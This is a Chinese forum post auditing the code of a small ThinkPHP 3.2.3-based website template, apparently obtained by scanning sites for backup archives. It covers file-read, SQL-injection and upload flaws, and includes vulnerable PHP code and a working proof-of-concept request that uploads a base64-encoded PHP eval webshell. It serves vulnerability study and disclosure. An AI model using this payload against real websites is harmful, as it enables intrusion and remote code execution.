入门MVC框架之私密小网站代码审计

秋紫山   ·   发表于 2021-04-30 17:01:59   ·   技术文章投稿区

最近发现自己有点刻苦哈哈哈,毕竟梦想还是要有的,万一实现了呢?
因为自己一直在学习用python编写小工具,然后看到了一些文章说什么扫描网站后台备份文件的脚本?好吧,我就参照着写了好久的脚本代码,都是低效率代码而已~
然后勉强算是写好了,运行了一下,哎查看结果还真扫出来了两个包~呵~还是有点用的嘛

好了进入正题:

一、框架分析

解压发现,目录有thinkphp,在tp的基础上进行的二次开发,tp存在的漏洞肯定存在!(因为一些文件的名字可以找到该模板,所以打码了~是不入流的模板,小弟爬了)

查看一下tp的版本:3.2.3

Tp3.2.3 可能存在缓存漏洞、sql注入漏洞,sql注入暂时放放,缓存漏洞看看有没有。
参考一下:https://bbs.zkaq.cn/t/4768.html#1.%20ThinkPHP%205.0.10-3.2.3%20%E7%BC%93%E5%AD%98%E5%87%BD%E6%95%B0%E8%AE%BE%E8%AE%A1%E7%BC%BA%E9%99%B7%E5%8F%AF%E5%AF%BC%E8%87%B4%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C
要存在漏洞的话,肯定需要调用tp框架的Cache::set方法,查找全局,看有没有调用。可惜没有调用,那就凉了。

二、网站结构分析

一键开启自动审计~一键开启自动审计~

趁着这个时间大致浏览了一下网站的结构,它没有把全部功能写到controller里面,没有将index.php作为唯一的入口文件,可以访问其他文件进入其他控制器。


它采用tp的URL_MODEL=0的模式,index.php对m传参进行清洗,网站如果访问index.php默认访问Home模块的index控制器。而想进入后台,则要找到入口文件××.php,它的m值为默认Admin,进入admin模块。

所以要进后台,如果××.php没有改变的话,那么访问××.php就可以了。

三、漏洞代码审计

(一)、傻瓜式漏洞


明显的任意文件读取漏洞,而且出错可以报出网站根目录。这个找到敏感信息便可以读取。


数据库账号密码就来了~

(二)、后台登录sql注入

什么??直接拼接post的值,实锤sql注入,但是不能万能钥匙登录,因为无论如何都要验证加密了的password是否正确,幸运的是这里可以用显错注入~

上sqlmap跑一下就可以了。
或者添加一个用户,进入后台搞事情嘻嘻嘻。这里暂时先不进去,看看前台有什么可以搞的。

(三)、前台sql注入

一堆sql注入,我不一一验证了,各位大佬们肯定能一眼看出来,比如以下:


都没有过滤,而且又没有使用tp的自带函数,那就凉了嘛。

(四)、前台文件上传漏洞

经过不懈的努力,终于找到了一个文件上传的漏洞,这道题有点像ctf,看来还是要多做点ctf的题呀,多练练思维。
以下为漏洞代码:

    /**
     * 公共上传图片方法
     */
    public function Upload(){
        $base64_image_content = I("post.img");
        $image_name = I("post.name");
        $len = I("post.size");
        $baseLen = strlen($base64_image_content);
        if($len!=$baseLen)  $this->error("上传图片不完整");
        if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)){
            $uploadFolder  = C('UPLOADPATH').date("Ymd")."/";
            if(!is_dir($uploadFolder)){
                if(!mkdir($uploadFolder, 0755, true)){
                    $this->error('创建文件失败');
                }
            }
            $type = $result[2];
            if(empty($image_name)){
                $new_file = $uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";
            }else{
                $new_file = $uploadFolder.$image_name."_".date("mdHis").".{$type}";
            }
            $img_64 = base64_decode(str_replace($result[1], '', $base64_image_content));
            if (file_put_contents($new_file,$img_64)){
                $this->success(complete_url($new_file));
            }
        }else{
            $this->error("图片不存在");
        }
    }
}

由图可知,代码使用tp框架的函数I() 来获取数据,具有一定的安全性,它的函数实现了html实体转化。但是呢,这里他使用了base64的编码进行输入,所以<>都可以生效。
接下来看一下满足的条件:

1.Size的post传参和$baseLen数据长度一样,也就是size就是img传参的长度。
2.preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)//只要输入的img满足data: image/jpg;base64, 就能匹配处三个结果:

3.是否存在目录。(肯定有的~)

代码往下走就是:$type=$result[2];
也就是说type是文件后缀,那让result[2]=php不就完美了?
于是就有:data: image/php;base64


再接着这段代码:


    if(empty($image_name)){
        $new_file = $uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";
    }else{
        $new_file = $uploadFolder.$image_name."_".date("mdHis").".{$type}";
    }
    $img_64 = base64_decode(str_replace($result[1], '', $base64_image_content));
    if (file_put_contents($new_file,$img_64)){
        $this->success(complete_url($new_file));
    }
    }else{
        $this->error("图片不存在");
    }

判断有无name传参,有就拼接目录、时间、和$type。其中type为后缀,那就OK,可以上传php文件。

最后看一下file_put_contents两个参数,$new_file 为写入的目录文件,$img_64为写入的内容。内容要是一句话木马才行。
$img_64是先进行替代操作str_replace($result[1], ‘’, $base64_image_content),再进行base64解码。所以data: image/jpg;base64,之后的内容是一句话木马的base64的加密内容就行。具体name的传参无关紧要,而size是要等于img的字符长度,即可触发文件上传漏洞。
总结就是,该漏洞因为太相信上传的img文件类型,而触发文件上传漏洞。

综上可得到poc为:

img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==& &name=jpg&size=63

PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==是一句话木马base加密的内容。

其中,要连接一句话木马就要知道时间戳。本地复现:


上传的文件名是jpg_0430130105.php 文件名不难猜,月日时秒
尝试实操:
url为:http://url/index.php?m=&c=indexAjax&a=upload
poc为:
img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==&name=jpg&size=63


上传成功,看看效果:


成功。菜刀就不连了~开溜
开溜是不可能开溜的,后续我还会再尝试一下这个审计一下,若有其他新奇的漏洞代码,我再上传~嘻。
想要一起审计的大佬们,欢迎联系噢~

心得:我自己通过学习了大约一星期的tp框架,才入门了这个审计,我觉得,不一定自己要有多懂代码,不一定要非得自己写一个网站,但是框架里面的应用包括内置函数这些一定要懂,而且这就像一个手机app一样,基本的操作方法会了之后,你就可以找出这个app有哪些小bug。但是像大佬一样,审计框架里的内容,那可能还有很远的路要走,有无大佬带带弟弟~~~

写文章不易,路过的大佬点一下赞嘛,风哥能给多一丢丢金币么,我以后会好好努力的!

用户名金币积分时间理由
Track-聂风 150.00 0 2021-05-14 14:02:05 加油,期待更好的代码审计文章

打赏我,让我更有动力~

1 Reply   |  Until 3天前 | 82 View

Track-聂风
发表于 3天前

提交CNVD换个证书

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016 - 2021. All Rights Reserved. 掌控者

Powered by 掌控者